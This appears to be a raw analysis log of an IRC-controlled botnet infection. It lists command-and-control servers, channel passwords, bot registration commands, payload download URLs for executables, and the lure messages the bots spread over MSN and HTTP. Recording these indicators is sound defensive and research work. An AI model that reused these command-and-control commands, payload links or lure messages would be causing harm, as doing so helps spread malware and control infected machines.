Remote Host Port Number
149.3.130.4 6667 PASS KCA
178.162.244.239:6667
* The data identified by the following URLs was then requested from the remote web server:
o http://api.wipmania.com/
o http://image-facebook.byinter.net/av.txt
o http://85.25.152.106/~aydin/beta.exe
NICK X{KCA|VNC}44689
USER aaqsf “fo9.net” “rage” :aaqsf
JOIN #vnc KCA
PONG irc.botnet.net
NICK KCA[iRooT-XP-USA]529225
USER 5292 “” “TsGh” :5292
JOIN #botnet KCA
PONG :irc.botnet.net
NICK n{US|XPa}brjxndz
USER brjxndz 0 0 :brjxndz
JOIN #BETA KCA
PRIVMSG #beta :[MSN]: Updated MSN spread message to “This is in the image that you? http://www.sohbetcell.net/images.php?id=”
Nick: KCA{AUT-XP}992432
Username: 9924
Server Pass: KCA
Joined Channel: #KCA with Password KCAt
Private Message to Channel #KCA: “www.metalteam.oRg”
PRIVMSG #aryan :[AryaN]: Successfully Executed Process: “C:Documents and SettingsUserNameApplication Data20510691721569.exe”
NICK n{US|XPa}cbdzfrs
USER cbdzfrs 0 0 :cbdzfrs
JOIN #BETA KCA
JOIN #X,#XX,#XXX
PRIVMSG #X :[MSN]: Updated MSN spread interval to “3”
PRIVMSG #X :[MSN]: Updated MSN spread message to “:O hahaha! http://image-facebook.byinter.net/profile.php?id=PIC-4024512198947-Facebook.JPG”
PRIVMSG #X :[HTTP]: Updated HTTP spread interval to “4”
PRIVMSG #X :[HTTP]: Updated HTTP spread message to “;) http://image-facebook.byinter.net/profile.php?id=PIC-4024512198947-Facebook.JPG”
PRIVMSG #BETA :[DNS]: Blocked 0 domain(s) – Redirected 1 domain(s)
PONG :irc.botnet.net
NICK New{US-XP-x86}1320867
USER 5777444 “” “5777444” :5777444
MODE New{US-XP-x86}1320867 +iMm
JOIN #aryan KCA
PRIVMSG #aryan :[AryaN]: Downloading File: “http://85.25.152.106/~aydin/beta.exe”
PRIVMSG #aryan :[AryaN]: Successfully Downloaded File To: “C:Documents and SettingsUserNameApplication Data20510691721569.exe”
UPDATE:
Download URLs
http://199.15.234.7/ (api.wipmania.com)
http://85.25.152.106/~aydin/av.txt (85.25.152.106)
http://85.25.152.106/~aydin/mer.exe (85.25.152.106)
http://85.25.152.106/~aydin/mer.exe (85.25.152.106)
Outgoing connection to remote server: api.wipmania.com TCP port 80
C&C Server: 88.255.116.47:1453
Server Password:
Username: htkzlwt
Nickname: n{DE|XPa}htkzlwt
Channel: #XXX (Password: KCA)
Channeltopic: :!mdns http://85.25.152.106/~aydin/av.txt !j #X
hosting infos:
http://whois.domaintools.com/149.3.130.4